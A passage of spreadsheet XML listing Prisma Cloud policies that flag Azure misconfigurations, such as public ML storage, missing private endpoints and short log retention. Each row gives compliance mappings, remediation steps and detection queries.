          <t>HIPAA, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, TX-RAMP Level 2, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, CSA CCM v4.0.12, HITRUST CSF v.11.2.0, ITSG-33, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, TX-RAMP Level 1, ITSG-33, Microsoft Cloud Security Benchmark v1, SOC 2, SOC 2, ITSG-33, TX-RAMP Level 2, ISO/IEC 27001:2022, NIST 800-53 Rev 5, HIPAA, HIPAA</t>
        </is>
      </c>
      <c r="B2303" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2303" s="2" t="inlineStr"/>
      <c r="D2303" t="inlineStr"/>
      <c r="E2303" t="inlineStr"/>
      <c r="F2303" t="inlineStr"/>
      <c r="G2303" t="b">
        <v>1</v>
      </c>
      <c r="H23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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2303" t="inlineStr">
        <is>
          <t>azure-machine-learning</t>
        </is>
      </c>
      <c r="K2303" t="inlineStr">
        <is>
          <t>Azure Storage Account storing Machine Learning workspace high business impact data is publicly accessible</t>
        </is>
      </c>
      <c r="L2303" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2303" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2303" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2303" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2303" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2303" t="inlineStr">
        <is>
          <t>164.312(e)</t>
        </is>
      </c>
      <c r="R2303" t="inlineStr">
        <is>
          <t>164.312(e)(2)(i)</t>
        </is>
      </c>
      <c r="S2303" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2303" t="b">
        <v>0</v>
      </c>
      <c r="U2303" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2303" t="inlineStr">
        <is>
          <t>azure-machine-learning-workspace</t>
        </is>
      </c>
      <c r="W2303" t="inlineStr">
        <is>
          <t>This policy identifies Azure Storage Accounts storing Machine Learning workspace high business impact data that are publicly accessible. Azure Storage account stores machine learning artifacts such as job logs. By default, this storage account is used when you upload data to the workspace. The attacker could exploit publicly accessible storage account to get machine learning workspace high business impact data logs and could breach in to the system by leveraging data exposed. It is recommended to restrict storage account access to only to the machine learning services as per business requirement.</t>
        </is>
      </c>
      <c r="X2303" t="inlineStr">
        <is>
          <t>To restirct Storage account access, refer the below URL:
https://learn.microsoft.com/en-gb/azure/storage/blobs/anonymous-read-access-configure?tabs=portal</t>
        </is>
      </c>
      <c r="Y2303" t="inlineStr"/>
      <c r="Z2303" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-machine-learning-workspace' AND json.rule = 'properties.provisioningState equal ignore case Succeeded and properties.hbiWorkspace is true and properties.storageAccount exists' as X; config from cloud.resource where api.name = 'azure-storage-account-list' AND json.rule = 'totalPublicContainers &gt; 0 and (properties.allowBlobPublicAccess is true or properties.allowBlobPublicAccess does not exist)' as Y; filter '$.X.properties.storageAccount contains $.Y.id'; show Y;</t>
        </is>
      </c>
      <c r="AA2303" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2303" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2303" t="inlineStr">
        <is>
          <t>PC-AZR-STO-1086</t>
        </is>
      </c>
      <c r="AD2303" t="b">
        <v>1</v>
      </c>
      <c r="AE2303" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2303" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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3" t="inlineStr">
        <is>
          <t>c88ad039-ca17-4371-a7e0-47b9eb33336e</t>
        </is>
      </c>
      <c r="AI2303" t="inlineStr">
        <is>
          <t>14d69eff-7a20-4709-9129-66c774d91dea</t>
        </is>
      </c>
      <c r="AJ2303" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2303" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2304">
      <c r="A2304" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2304" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2304" s="2" t="inlineStr"/>
      <c r="D2304" t="inlineStr"/>
      <c r="E2304" t="inlineStr"/>
      <c r="F2304" t="inlineStr"/>
      <c r="G2304" t="b">
        <v>1</v>
      </c>
      <c r="H23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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2304" t="inlineStr">
        <is>
          <t>azure-machine-learning</t>
        </is>
      </c>
      <c r="K2304" t="inlineStr">
        <is>
          <t>Azure Machine learning workspace is not configured with private endpoint</t>
        </is>
      </c>
      <c r="L2304" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2304" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2304" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2304" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2304" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2304" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2304" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S2304" t="inlineStr"/>
      <c r="T2304" t="b">
        <v>0</v>
      </c>
      <c r="U2304" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2304" t="inlineStr">
        <is>
          <t>azure-machine-learning-workspace</t>
        </is>
      </c>
      <c r="W2304" t="inlineStr">
        <is>
          <t>This policy identifies Azure Machine learning workspaces that are not configured with private endpoint. Private endpoints in workspace resources allow clients on a virtual network to securely access data over Azure Private Link. Configuring a private endpoint enables access to traffic coming from only known networks and prevents access from malicious or unknown IP addresses which includes IP addresses within Azure. It is recommended to create private endpoint for secure communication for your Machine learning workspaces.</t>
        </is>
      </c>
      <c r="X2304" t="inlineStr">
        <is>
          <t>1. Login to Azure portal
2. Navigate to 'Azure Machine Learning' dashboard
3. Click on the reported Azure Machine learning workspace
4. Configure Private endpoint connections under 'Networking' from left panel.
For information refer:
https://learn.microsoft.com/en-us/azure/machine-learning/how-to-configure-private-link 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azure-239
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azure-239</t>
        </is>
      </c>
      <c r="Y2304" t="inlineStr"/>
      <c r="Z2304" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-machine-learning-workspace' AND json.rule = properties.provisioningState equal ignore case Succeeded and (properties.privateEndpointConnections[*] does not exist or properties.privateEndpointConnections[*] is empty or (properties.privateEndpointConnections[*] exists and properties.privateEndpointConnections[*].properties.privateLinkServiceConnectionState.status does not equal ignore case Approved))
{"category":"Networking","resourceTypes":["Microsoft.MachineLearningServices/workspaces"]}</t>
        </is>
      </c>
      <c r="AA2304" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2304" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2304" t="inlineStr">
        <is>
          <t>PC-AZR-AML-1097-CKV_AZURE_243</t>
        </is>
      </c>
      <c r="AD2304" t="b">
        <v>1</v>
      </c>
      <c r="AE2304" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2304" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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4" t="inlineStr">
        <is>
          <t>a8e6f787-f937-42eb-9f71-ffc4cb17ba8a</t>
        </is>
      </c>
      <c r="AI2304" t="inlineStr">
        <is>
          <t>fb6849b4-d54a-4c95-a227-06a5ca1971e7</t>
        </is>
      </c>
      <c r="AJ2304" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2304" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2305">
      <c r="A2305" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, CSA CCM v4.0.12, TX-RAMP Level 2, ITSG-33, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, NIST 800-53 Rev 5, TX-RAMP Level 2, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, CSA CCM v4.0.12, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, CSA CCM v4.0.12, TX-RAMP Level 1, Microsoft Cloud Security Benchmark v1, SOC 2, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, DORA</t>
        </is>
      </c>
      <c r="B2305" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2305" s="2" t="inlineStr"/>
      <c r="D2305" t="inlineStr"/>
      <c r="E2305" t="inlineStr"/>
      <c r="F2305" t="inlineStr"/>
      <c r="G2305" t="b">
        <v>1</v>
      </c>
      <c r="H23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305" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2305" t="inlineStr">
        <is>
          <t>azure-machine-learning</t>
        </is>
      </c>
      <c r="K2305" t="inlineStr">
        <is>
          <t>Azure Key vault used for machine learning workspace secrets storage is not enabled with audit logging</t>
        </is>
      </c>
      <c r="L2305" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2305" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2305" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2305" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2305" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2305" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R2305" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S2305" t="inlineStr"/>
      <c r="T2305" t="b">
        <v>0</v>
      </c>
      <c r="U2305" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2305" t="inlineStr">
        <is>
          <t>azure-machine-learning-workspace</t>
        </is>
      </c>
      <c r="W2305" t="inlineStr">
        <is>
          <t>This policy identifies Azure Key vaults used for machine learning workspace secrets storage that are not enabled with audit logging.
Azure Key vaults are used to store machine learning workspace secrets and other sensitive information that is needed by the workspace. Enabling key vaults with audit logging will help in monitoring how and when machine learning workspace secrets are accessed, and by whom. This audit log data enhances visibility by providing valuable insights into the trail of interactions involving confidential information.
As a best practice,  it is recommended to enable audit event logging for key vaults used for machine learning workspace secrets storage.</t>
        </is>
      </c>
      <c r="X2305" t="inlineStr">
        <is>
          <t>1. Log in to Azure portal
2. Select 'Key vaults'
3. Select the key vault instance to modify
4. Select 'Diagnostic settings' under 'Monitoring'
5. Click on '+Add diagnostic setting'
6. In the 'Diagnostic setting' page, Select the Logs, Metrics and Destination details as per your business requirements.
7. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2305" t="inlineStr"/>
      <c r="Z2305" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-machine-learning-workspace' AND json.rule = properties.keyVault exists as X; config from cloud.resource where api.name = 'azure-key-vault-list' AND json.rule =  "not (diagnosticSettings.value[*].properties.logs[*].enabled any equal true and diagnosticSettings.value[*].properties.logs[*].enabled size greater than 0)" as Y; filter '$.X.properties.keyVault contains $.Y.name'; show Y;</t>
        </is>
      </c>
      <c r="AA2305" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2305" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2305" t="inlineStr">
        <is>
          <t>PC-AZR-KV-1205</t>
        </is>
      </c>
      <c r="AD2305" t="b">
        <v>1</v>
      </c>
      <c r="AE2305" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2305" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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05" t="inlineStr">
        <is>
          <t>a222e63e-3fc2-4b64-bf94-b504d2fab786</t>
        </is>
      </c>
      <c r="AI2305" t="inlineStr">
        <is>
          <t>1e21367d-068f-4eec-b75a-2e308d207c5c</t>
        </is>
      </c>
      <c r="AJ2305" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2305" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2306">
      <c r="A2306" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1</t>
        </is>
      </c>
      <c r="B2306" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2306" s="2" t="inlineStr"/>
      <c r="D2306" t="inlineStr"/>
      <c r="E2306" t="inlineStr"/>
      <c r="F2306" t="inlineStr"/>
      <c r="G2306" t="b">
        <v>1</v>
      </c>
      <c r="H23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306" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2306" t="inlineStr">
        <is>
          <t>azure-machine-learning</t>
        </is>
      </c>
      <c r="K2306" t="inlineStr">
        <is>
          <t>Azure Machine learning workspace configured with high business impact data have unrestricted network access</t>
        </is>
      </c>
      <c r="L2306" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2306" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2306" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2306" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2306" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2306" t="inlineStr">
        <is>
          <t>CM</t>
        </is>
      </c>
      <c r="R2306" t="inlineStr">
        <is>
          <t>CM-07-00 : Least Functionality</t>
        </is>
      </c>
      <c r="S2306" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2306" t="b">
        <v>0</v>
      </c>
      <c r="U2306" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2306" t="inlineStr">
        <is>
          <t>azure-machine-learning-workspace</t>
        </is>
      </c>
      <c r="W2306" t="inlineStr">
        <is>
          <t>This policy identifies Azure Machine learning workspaces configured with high business impact data with unrestricted network access. 
Overly permissive public network access allows access to resource through the internet using a public IP address and that resource having High Business Impact (HBI) data could lead to sensitive data exposure. 
As a best practice, it is recommended to limit access to your workspace and endpoint to specific public internet IP addresses, ensuring that only authorized entities can access them according to business requirements.</t>
        </is>
      </c>
      <c r="X2306" t="inlineStr">
        <is>
          <t>To restirct internet IP ranges on your existing Machine learning workspace, follow the below URL:
https://learn.microsoft.com/en-us/azure/machine-learning/how-to-configure-private-link?view=azureml-api-2&amp;tabs=azure-portal#enable-public-access-only-from-internet-ip-ranges-preview</t>
        </is>
      </c>
      <c r="Y2306" t="inlineStr"/>
      <c r="Z2306" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-machine-learning-workspace' AND json.rule = properties.provisioningState equal ignore case Succeeded and properties.publicNetworkAccess equal ignore case Enabled and (properties.ipAllowlist does not exist or properties.ipAllowlist is empty) and properties.hbiWorkspace is true</t>
        </is>
      </c>
      <c r="AA2306" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2306" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2306" t="inlineStr">
        <is>
          <t>PC-AZR-AML-1085</t>
        </is>
      </c>
      <c r="AD2306" t="b">
        <v>1</v>
      </c>
      <c r="AE2306" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2306" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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06" t="inlineStr">
        <is>
          <t>7e8b0cd4-8f22-46b5-adfe-9bf22773ba54</t>
        </is>
      </c>
      <c r="AI2306" t="inlineStr">
        <is>
          <t>75afcbd3-1a5b-49df-ba2a-8310f5cb3b85</t>
        </is>
      </c>
      <c r="AJ2306" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2306" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2307">
      <c r="A2307" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CIS Controls v7.1, Sarbanes Oxley Act (SOX), CRI Profile v1.2.1, Fedramp (Low), kashan ACSC Information Security Manual (ISM), jneytchev-fedramp-low, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO 27002:2022, MLPS 2.0 (Level 2), ISO/IEC 27001:2022, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, ITSG-33, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), PCI DSS v3.2.1, jneytchev-fedramp-low, NIST CSF, CSA CCM v4.0.12, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, NIST 800-53 Rev 5, SOC 2, GDPR, TX-RAMP Level 2, CSA CCM v4.0.12, CSA CCM v3.0.1, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, NIST 800-53 Rev4, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, CyberSecurity Law of the People's Republic of China, TX-RAMP Level 2, ISO 27001:2013, kashan ACSC Information Security Manual (ISM), CIS Controls v8, SOC 2, PCI DSS v4.0, Fedramp (Moderate), Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, Copy of SOC 2, NIST SP 800-171 Revision 3, Fedramp (Moderate), SOC 2, CIS Controls v8.1, Copy of SOC 2, HITRUST CSF v9.3 [Deprecated], CDC NIST 800-53 Rev4, ITSG-33, TX-RAMP Level 2, Copy of SOC 2, TX-RAMP Level 1, Copy of SOC 2, Fedramp (Moderate), NIST SP 800-171 Revision 2, HITRUST CSF v.11.2.0, kfirdaus AWS Account-CS, CyberSecurity Law of the People's Republic of China, testazure, TX-RAMP Level 2, NIST 800-53 Rev4, CDC NIST 800-53 Rev4, HITRUST CSF v9.3 [Deprecated], CIS v1.1 (Azure), DORA, Insurance Regulatory And Development Authority Of India, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, HITRUST CSF v9.3 [Deprecated], PIPEDA, SOC 2, SOC 2, APRA (CPS 234) Information Security, HIPAA, HITRUST CSF v.11.2.0, Fedramp (Low), HITRUST CSF v9.3 [Deprecated], CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, Copy of CIS Controls v8, RBI Baseline Cyber Security and Resilience Requirements, SOC 2, NIST SP 800-172, Secure Controls Framework (SCF) - 2024.2, ITSG-33, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), CCPA 2018, Microsoft Cloud Security Benchmark v1, CSA CCM v3.0.1, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), NIST SP 800-171 Revision 3, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.1.02, SOC 2, NIST SP 800-171 Revision 3, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], Brazilian Data Protection Law (LGPD), NIST 800-53 Rev4</t>
        </is>
      </c>
      <c r="B2307" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2307" s="2" t="inlineStr"/>
      <c r="D2307" t="inlineStr"/>
      <c r="E2307" t="inlineStr"/>
      <c r="F2307" t="inlineStr"/>
      <c r="G2307" t="b">
        <v>1</v>
      </c>
      <c r="H23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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2307" t="inlineStr">
        <is>
          <t>azure-monitor-log</t>
        </is>
      </c>
      <c r="K2307" t="inlineStr">
        <is>
          <t>Azure Activity Log retention should not be set to less than 365 days</t>
        </is>
      </c>
      <c r="L2307" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2307" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2307" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2307" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2307" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2307" t="inlineStr">
        <is>
          <t>SI-1</t>
        </is>
      </c>
      <c r="R2307" t="inlineStr">
        <is>
          <t>SI-12</t>
        </is>
      </c>
      <c r="S2307" t="inlineStr"/>
      <c r="T2307" t="b">
        <v>1</v>
      </c>
      <c r="U2307" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2307" t="inlineStr">
        <is>
          <t>azure-monitor-log-profiles-list</t>
        </is>
      </c>
      <c r="W2307" t="inlineStr">
        <is>
          <t>This policy identifies Log profiles which have log retention set to less than 365 days. Log profile controls how your Activity Log is exported and retained. Since the average time to detect a breach is over 200 days, it is recommended to retain your activity log for 365 days or more in order to have time to respond to any incidents.</t>
        </is>
      </c>
      <c r="X2307" t="inlineStr">
        <is>
          <t>If a log profile already exists, you first must remove the existing log profile, and then create a log profile.
Follow URL to create new log profile:
https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/activity-log?tabs=cli#managing-legacy-log-profiles
Make sure you set retention days to 365 or more days. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/set-activity-log-retention-to-365-days-or-greater
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/set-activity-log-retention-to-365-days-or-greater</t>
        </is>
      </c>
      <c r="Y2307" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Insights/LogProfiles/[Read,
Write,
Delete]' permission. Successful execution will update the Azure monitor log profile retention policy days to 365 days.",
'impact': 'update the Azure monitor log profile retention policy days to 365 days',
'cliScriptTemplate': 'az monitor log-profiles update --name $resourceName --set retentionPolicy.days=365 retentionPolicy.enabled=true location=global'</t>
        </is>
      </c>
      <c r="Z2307" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-monitor-log-profiles-list' AND json.rule = isLegacy is true and (properties.retentionPolicy does not exist or properties.retentionPolicy.enabled is false or (properties.retentionPolicy.enabled is true and (properties.retentionPolicy.days does not equal 0 and properties.retentionPolicy.days &lt; 365)))
{"category":"Logging","resourceTypes":["azurerm_monitor_log_profile"]}</t>
        </is>
      </c>
      <c r="AA2307" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2307" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2307" t="inlineStr">
        <is>
          <t>PC-AZR-MON-100-CKV_AZURE_37</t>
        </is>
      </c>
      <c r="AD2307" t="b">
        <v>1</v>
      </c>
      <c r="AE2307" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2307" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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7" t="inlineStr">
        <is>
          <t>a9937384-1ee3-430c-acda-fb97e357bfcd</t>
        </is>
      </c>
      <c r="AI2307" t="inlineStr">
        <is>
          <t>700e9da9-b460-41f7-a4c6-b38cc9fcf588</t>
        </is>
      </c>
      <c r="AJ2307" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2307" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2308">
      <c r="A2308" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, Azure Security Benchmark (v3), RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CDC NIST 800-53 Rev4, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), ISO 27002:2022, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27002:2013, CIS v1.3.1 (Azure), Copy of Azure Security Benchmark (v3), ITSG-33, Secure Controls Framework (SCF) - 2024.2, MTSBv2_Azure, PCI DSS v4.0, PCI DSS v4.0, ITSG-33, MITRE ATT&amp;CK v12, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, TX-RAMP Level 1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, New Zealand Information Security Manual (NZISM v3.4), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CIS v1.5.0 (Azure) - Level 1, PCI DSS v3.2.1, CIS Controls v8, CSA CCM v.4.0.1, HITRUST CSF v.11.2.0, GDPR, ISO/IEC 27017:2015, CIS Controls v8.1, kfirdaus AWS Account-CS, Copy of Azure Security Benchmark (v3), CIS Controls v7.1, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, Azure Security Benchmark (v3), ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Azure Security Benchmark (v2), TX-RAMP Level 1, Telecommunications Security Act - TSA, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, TX-RAMP Level 2, NIST 800-53 Rev 5, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, NIST 800-53 Rev 5, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 1, TX-RAMP Level 2, CIS v1.4.0 (Azure), Insurance Regulatory And Development Authority Of India, CyberSecurity Law of the People's Republic of China, CSA CCM v4.0.12, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CIS v1.3.0 (Azure), RBI Baseline Cyber Security and Resilience Requirements, CyberSecurity Law of the People's Republic of China, NIST 800-53 Rev 5, Copy of CIS Controls v8, ITSG-33, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, CIS Controls v8, TX-RAMP Level 1, FFIEC, CSA CCM v.4.0.1, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, NIST 800-53 Rev4, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS Controls v7.1, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, PCI DSS v4.0, SOC 2, ITSG-33, APRA (CPS 234) Information Security, HIPAA, kfirdaus AWS Account-CS, Fedramp (Moderate), NIST CSF, Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 2, PCI DSS v4.0, PCI DSS v4.0, SOC 2, CRI Profile v1.2.1, CSA CCM v.4.0.6, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, CyberSecurity Law of the People's Republic of China, Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 2, PCI DSS v3.2.1, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, TX-RAMP Level 2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B2308" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2308" s="2" t="inlineStr"/>
      <c r="D2308" t="inlineStr"/>
      <c r="E2308" t="inlineStr"/>
      <c r="F2308" t="inlineStr"/>
      <c r="G2308" t="b">
        <v>0</v>
      </c>
